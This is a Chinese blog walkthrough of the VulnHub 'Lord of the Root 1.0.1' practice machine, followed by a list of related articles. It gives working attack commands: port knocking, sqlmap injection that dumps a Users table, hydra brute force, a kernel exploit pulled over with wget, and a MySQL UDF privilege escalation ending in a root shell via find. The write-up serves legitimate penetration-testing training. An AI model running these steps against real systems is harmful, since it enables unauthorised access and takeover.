Vulnhub-LORD OF THE ROOT: 1.0.1

最新推荐文章于 2024-06-19 18:11:50 发布
最新推荐文章于 2024-06-19 18:11:50 发布
阅读量478 收藏 11
点赞数 7
分类专栏: # vulnhub 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58528311/article/details/135722856
版权

一、信息收集

端口扫描、发现只开了22端口

连接ssh后提示端口碰撞:

端口敲门是一种通过在一组预先指定的关闭端口上产生连接请求,从外部打开防火墙上的端口的方法。一旦收到正确地连接请求序列,防火墙规则就会被动态修改,以允许发送连接请求的主机通过特定端口进行连接。

端口敲门的主要目的是防止攻击者通过进行端口扫描来扫描系统中潜在的可利用服务,因为除非攻击者发送正确的碰撞序列,否则受保护的端口将显示为关闭

有两个方法进行碰撞

  1. knock:knock 192.168.1.18 1 2 3 -v

  1. hping3:hping3 -S 192.168.1.18 -p 1 -c 1

扫描端口发现1337端口被打开了

访问robots.txt文件查看源码有个bas64编码的字符串

通过两次解码后发现是一个路径

二、漏洞利用

是一个登录框

抓取POST登录数据包,利用sqlmap检测到存在sql注入

sqlmap -r 1.txt --dbs

sqlmap -r 1.txt -D Webapp --tables

sqlmap -r 1.txt -D Webapp -T Users --columns

sqlmap -r 1.txt -D Webapp -T Users -C password,username --dump

把账号和密码分别写在文件里面再利用hydra进行爆破

三、提权

1. 内核提权

登录后使用命令:lsb_release -a

版本为:Ubuntu 14.04 发现39166.c脚本可以提权

利用python开启http协议,再攻击机上使用wget下载

执行脚本提权成功

2. Mysql提权

查看mysql的版本

locate lib_mysqludf_sys //查看本地udf
cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.so /root/udf.so   //将lib_mysqludf_sys_32.so复制到/root下操作
du udf.so //查看大小方便后面使用不同的二进制类型

使用python开启http服务把文件下载到靶机tmp目录中

use mysql;  //使用mysql数据库
create table udf(line blob);  //创建udf表,用于存放本地传来的udf文件的内容.
insert into udf values(load_file('/tmp/udf.so'));//在表中写入udf文件内容
select * from udf into dumpfile'/usr/lib/mysql/plugin/udf.so'; //将udf文件内容传入新建的udf.so文件中,路径根据自己的文件路径修改
create function sys_eval returns string soname 'udf.so';  //创建自定义函数
select * from mysql.func; //查看函数
select sys_eval('chmod u+x /usr/bin/find'); //调用sys_eval函数来给find命令所有者的suid权限,使其可以执行root命令

退出后利用find提权:find / -exec '/bin/sh' \;

Plkaciu
关注
  • 7
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mq-msgpush-sdk-1.0.1.jar
05-24
mq-msgpush-sdk-1.0.1jar包及资源
vue-source-code-analysis:Vue 1.0.1-vue source code
03-24
Vue 1.0.1 在Vue2.X上排名1.X版本没有用Flow进行类型检查,个人觉得看着没那么吃力(太懒);但是类型信息还是挺有用的,它能帮助我们更好的理解源码,Vue3。 0会用TypeScript 原始码调试: 直接链接到cdn的一个版本...
No.6-VulnHub-Lord Of The Root: 1.0.1-Walkthrough渗透学习
qq_34801745的博客
01-01 2085
** VulnHub-Lord Of The Root: 1.0.1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/ 靶机难度:中等(CTF) 靶机发布日期:2015年9月23日 靶机描述:这是KoocSec为黑客练习准备的另一个Boot2Root挑战。他通过OSCP考试的启发准备了这一过程。它...
【渗透测试】VulnHub-Lord Of The Root: 1.0.1
m0_52923241的博客
11-20 221
VulnHub-Lord Of The Root: 1.0.1VulnHub-Lord Of The Root: 1.0.1渗透测试详细流程小知识点常用工具 VulnHub-Lord Of The Root: 1.0.1渗透测试详细流程 参考:https://mp.weixin.qq.com/s/RcdNhvbUh9A-ZMdnoULYMQ 距离上次打靶机隔好久了,因为一些事情耽搁了。渗透学习之路继续~ 渗透思路: 与前几个一样,显示nmap扫ip、端口,这次开放的只有22端口。 通过学习,有一个端口碰撞(
VulnHub-Lord Of The Root_1.0.1(打个靶机玩一下)
weixin_44954642的博客
08-08 415
该篇章目的是牢固地基,加强每日训练操作的笔记,在记录笔记中会有很多跳跃性思维的操作和方式方法,大家一起加油,动起来。
VulnHub-Lord Of The Root_1.0.1-靶机渗透学习
嗯嗯呐的博客
11-17 708
靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/ 靶机难度:中等(CTF) 靶机描述:这是KoocSec为黑客练习准备的另一个Boot2Root挑战。他通过OSCP考试的启发准备了这一过程。它基于伟大的小说改制电影《指环王》的概念。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 一、信息采集 nmap扫描确定靶机IP地址 扫描靶机对外开放端口,开始信息采集 只扫描出22端口 连接22端口获得提示 knock f
6-VulnHub-Lord Of The Root 1.0.1
尼德霍格007
07-16 145
VulnHub-Lord Of The Root: 1.0.1 靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/ 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-7-16 信息收集 扫描目标主机 nmap -sP 192.168.21.0/24 扫描开放端口 nmap -A -p 1-1000 192.168.21.141 看到只开放了22端口,尝试连接一下 easy as 1,2,
OSCP vulhub LORD OF THE ROOT: 1.0.1
weixin_51387754的博客
01-12 397
Offensive Security 认证专家(Offensive Security Certified Professional,缩写 OSCP),是 Offensive Security 提供的一项道德黑客认证,它教授渗透测试方法和Kali Linux发行版(BackTrack的后续版本)中所包含工具的使用方法。
vulnhub靶场之 LordOfTheRoot_1.0.1
wanan的博客
10-09 967
vulnhub靶场之 LordOfTheRoot_1.0.1
靶机渗透练习43-Lord Of The Root
hirak0的博客
04-19 2086
靶机描述 靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/ Description I created this machine to help others learn some basic CTF hacking strategies and some tools. I aimed this machine to be very similar in difficulty to those I was breaking on
靶机渗透练习90-Grotesque:1.0.1
hirak0的博客
05-02 2791
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
geronimo-j2ee-management_1.1_spec-1.0.1-API文档-中文版.zip
04-08
赠送原API文档:geronimo-j2ee-management_1.1_spec-1.0.1-javadoc.jar; 赠送源代码:geronimo-j2ee-management_1.1_spec-1.0.1-sources.jar; 包含翻译后的API文档:geronimo-j2ee-management_1.1_spec-1.0.1-...
ws-commons-java5-1.0.1.jar
12-22
ws-commons-java5-1.0.1.jar
emas-services-1.0.1.jar
09-17
<!... ... <artifactId>emas-services <version>1.0.1 mvn install:install-file -DgroupId=com.aliyun.ams -DartifactId=emas-services -Dversion=1.0.1 -Dpackaging=jar -Dfile=F:\jars\emas-services-1.0.1.jar
网络安全攻防基础入门笔记--操作系统&名词解释&文件下载&反弹shell&防火墙绕过
谜语人的博客
06-15 1108
全程Proof of Concept,中文"概念验证",常指一段漏洞证明的代码。
网络安全(补充)
m0_62207482的博客
06-15 580
物理安全威胁一般分为自然安全威胁和人为安全威胁。自然安全威胁包括地震、洪水、火灾、鼠害、雷电;;;;人为安全威胁包括盗窃、爆炸、毁坏、硬件安全 防火墙白名单策略:只允许符合安全规则的包通过防火墙,其他通信包禁止 防火墙名单策略:禁止与安全规则相冲突的包通过防火墙,其他通信包都允许 将入侵检测系统置于防火墙内部,使得很多对网络的攻击首先被防火墙过滤,也就是防火墙是首当其冲的,从而减少了对内部入侵检测系统的干扰,提高入侵检测系统的准确率,但是其检测能力不会变化 通过VPN技术,企业可以在远程用户、分
深信服科技:2023网络安全深度洞察及2024年趋势研判报告
最新发布
2301_76786857的博客
06-19 188
2023 年,生成式人工智能和各种大模型迅速应用在网络攻击与对抗中,带来了新型攻防场景和安全威胁。漏洞利用链组合攻击实现攻击效果加成,在国家级对抗中频繁使用。勒索团伙广泛利用多个信创系统漏洞,对企业数据安全与财产安全造成了严重威胁。数据泄露问题频频出现,个人信息泄露成为了关注的焦点;同时,境外网络攻击势力不断刺探,APT 攻击技术不断更新。 2023年网络安全呈现出哪些演变趋势?本报告将重点围绕安全漏洞、恶意软件、数据安全和 APT攻击四个领域展开观察,并对 2024 年网络安全需重点关注的方向进行深入思考
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值